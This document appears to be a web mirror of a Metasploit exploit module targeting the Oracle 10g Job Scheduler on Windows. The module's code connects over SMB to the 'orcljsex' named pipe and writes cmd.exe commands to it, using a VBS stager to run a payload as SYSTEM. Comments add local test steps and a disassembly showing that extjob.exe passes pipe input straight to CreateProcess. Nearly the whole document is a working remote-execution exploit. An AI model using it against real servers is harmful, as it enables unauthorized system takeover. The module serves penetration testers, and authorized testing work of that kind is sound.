Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/oracle/extjob.rb
19534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::SMB::Client

10
  include Msf::Exploit::CmdStager

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Oracle Job Scheduler Named Pipe Command Execution',

17
        'Description' => %q{

18
          This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job

19
          Scheduler is implemented via the component extjob.exe which listens on a named pipe

20
          called "orcljsex<SID>" and execute arbitrary commands received over this channel via

21
          CreateProcess(). In order to connect to the Named Pipe remotely, SMB access is required.

22
          Note that the Job Scheduler is disabled in default installations.

23
        },

24
        'Author' => [

25
          'David Litchfield', # Vulnerability discovery and exploit

26
          'juan vazquez',     # Metasploit module

27
          'sinn3r'            # Metasploit fu

28
        ],

29
        'License' => MSF_LICENSE,

30
        'References' => [

31
          [ 'URL', 'http://www.amazon.com/Oracle-Hackers-Handbook-Hacking-Defending/dp/0470080221' ],

32
        ],

33
        'Payload' => {

34
          'Space' => 2048,

35
        },

36
        'Platform' => 'win',

37
        # This module has been tested on Oracle 10g Release 1

38
        # where the Oracle Job Scheduler runs as SYSTEM on Windows

39
        'Targets' => [['Automatic', {}]],

40
        'CmdStagerFlavor' => 'vbs',

41
        'Privileged' => true,

42
        'DisclosureDate' => '2007-01-01',

43
        'DefaultTarget' => 0,

44
        'Notes' => {

45
          'Reliability' => UNKNOWN_RELIABILITY,

46
          'Stability' => UNKNOWN_STABILITY,

47
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

48
        }

49
      )

50
    )

51


52
    register_options(

53
      [

54
        OptString.new('SID', [ true, 'The database sid', 'ORCL'])

55
      ]

56
    )

57
  end

58


59
  def exploit

60
    if check == Exploit::CheckCode::Vulnerable

61
      print_status("Exploiting through \\\\#{datastore['RHOST']}\\orcljsex#{datastore['SID']} named pipe...")

62
      execute_cmdstager({ :linemax => 1500 })

63
      handler

64
    else

65
      print_error "Host does not appear to be vulnerable!"

66
    end

67
  end

68


69
  def execute_command(cmd, opts)

70
    connect()

71
    smb_login()

72
    pipe = simple.create_pipe("\\orcljsex#{datastore['SID']}")

73
    pipe.write("cmd.exe /q /c #{cmd}")

74
    pipe.close

75
    disconnect

76
  end

77


78
  def check

79
    begin

80
      connect()

81
      smb_login()

82
      pipe = simple.create_pipe("\\orcljsex#{datastore['SID']}")

83
      pipe.write("cmd.exe /q /c dir")

84
      result = pipe.read() # Exit Code

85
      pipe.close

86
      disconnect

87
    rescue

88
      return Exploit::CheckCode::Safe

89
    end

90


91
    if result == "1" # Exit Code should be 1

92
      return Exploit::CheckCode::Vulnerable

93
    end

94


95
    return Exploit::CheckCode::Safe

96
  end

97
end

98


99
=begin

100
How To Test locally:

101
1. Go to Administrative Tools -> Services -> Set 'OracleJobSchedulerORCL' to automatic, and

102
   then Start the service.

103
2. Make sure you know your SMBUser and SMBPass

104
3. Run:

105
   C:\Documents and Settings\juan\PipeList>echo cmd.exe /c calc.exe > \\.\pipe\orcljsexorcl

106


107
Code Analysis of extjob.exe (Oracle 10g Release 1)

108
=================================================

109


110
From _ServiceStart():

111


112
* Create Named Pipe and store handle on "esi":

113


114
.text:004017EC                 push    offset _pipename

115
.text:004017F1                 lea     ecx, [ebp+Name]

116
.text:004017F7                 push    offset $SG59611 ; "\\\\.\\pipe\\orcljsex%s"

117
.text:004017FC                 push    ecx

118
.text:004017FD                 jmp     short loc_401810

119
.text:004017FF ; ---------------------------------------------------------------------------

120
.text:004017FF

121
.text:004017FF loc_4017FF:                             ; CODE XREF: _ServiceStart+FAj

122
.text:004017FF                 push    offset $SG59613

123
.text:00401804                 lea     edx, [ebp+Name]

124
.text:0040180A                 push    offset $SG59614 ; "\\\\.\\pipe\\orcljsex%s"

125
.text:0040180F                 push    edx             ; Dest

126
.text:00401810

127
.text:00401810 loc_401810:                             ; CODE XREF: _ServiceStart+10Dj

128
.text:00401810                 call    ds:__imp__sprintf

129
.text:00401816                 add     esp, 0Ch

130
.text:00401819                 push    edi

131
.text:0040181A                 push    edi

132
.text:0040181B                 push    4

133
.text:0040181D                 call    _ReportStatusToSCMgr

134
.text:00401822                 add     esp, 0Ch

135
.text:00401825                 test    eax, eax

136
.text:00401827                 jz      loc_4018EC

137
.text:0040182D                 mov     edi, ds:__imp__CreateNamedPipeA@32 ; CreateNamedPipeA(x,x,x,x,x,x,x,x)

138
.text:0040185C                 mov     esi, eax

139


140
* Connect Named Pipe

141


142
.text:0040188F                 push    eax             ; lpOverlapped

143
.text:00401890                 push    esi             ; hNamedPipe

144
.text:00401891                 call    ds:__imp__ConnectNamedPipe@8 ; ConnectNamedPipe(x,x)

145


146
* Create Thread with ExecMain() as lpStartAddress and esi (The Pipe handle) as parameter

147


148
.text:004018B9                 lea     edx, [ebp+ThreadId]

149
.text:004018BC                 push    edx             ; lpThreadId

150
.text:004018BD                 push    0               ; dwCreationFlags

151
.text:004018BF                 push    esi             ; lpParameter

152
.text:004018C0                 push    offset _ExecMain ; lpStartAddress

153
.text:004018C5                 push    0               ; dwStackSize

154
.text:004018C7                 push    0               ; lpThreadAttributes

155
.text:004018C9                 call    ds:__imp__CreateThread@24 ; CreateThread(x,x,x,x,x,x)

156


157
From ExecMain():

158


159
* Stores Named Pipe Handle in ebx

160


161
.text:0040197C                 mov     ebx, [ebp+hObject]

162


163
* Read From Named Pipe

164


165
.text:004019C4                 lea     eax, [ebp+NumberOfBytesRead]

166
.text:004019C7                 push    edx             ; lpOverlapped

167
.text:004019C8                 push    eax             ; lpNumberOfBytesRead

168
.text:004019C9                 lea     ecx, [ebp+Buffer]

169
.text:004019CF                 push    10000h          ; nNumberOfBytesToRead

170
.text:004019D4                 push    ecx             ; lpBuffer

171
.text:004019D5                 push    ebx             ; hFile

172
.text:004019D6                 call    ds:__imp__ReadFile@20 ; ReadFile(x,x,x,x,x)

173


174
* CreateProcess with lpCommandLine full controlled by the user input

175


176
.text:00401A06                 mov     ecx, 11h

177
.text:00401A0B                 xor     eax, eax

178
.text:00401A0D                 lea     edi, [ebp+StartupInfo]

179
.text:00401A10                 push    esi

180
.text:00401A11                 rep stosd

181
.text:00401A13                 lea     eax, [ebp+ProcessInformation]

182
.text:00401A16                 lea     ecx, [ebp+StartupInfo]

183
.text:00401A19                 push    eax             ; lpProcessInformation

184
.text:00401A1A                 push    ecx             ; lpStartupInfo

185
.text:00401A1B                 push    0               ; lpCurrentDirectory

186
.text:00401A1D                 push    0               ; lpEnvironment

187
.text:00401A1F                 push    0               ; dwCreationFlags

188
.text:00401A21                 push    0               ; bInheritHandles

189
.text:00401A23                 push    0               ; lpThreadAttributes

190
.text:00401A25                 lea     edx, [ebp+Buffer]

191
.text:00401A2B                 push    0               ; lpProcessAttributes

192
.text:00401A2D                 push    edx             ; lpCommandLine

193
.text:00401A2E                 push    0               ; lpApplicationName

194
.text:00401A30                 mov     [ebp+StartupInfo.cb], 44h

195
.text:00401A37                 mov     [ebp+StartupInfo.wShowWindow], 5

196
.text:00401A3D                 mov     [ebp+StartupInfo.dwFlags], 100h

197
.text:00401A44                 mov     [ebp+StartupInfo.lpDesktop], offset $SG59671

198
.text:00401A4B                 call    ds:__imp__CreateProcessA@40 ; CreateProcessA(x,x,x,x,x,x,x,x,x,x)

199


200


201
=end

202


203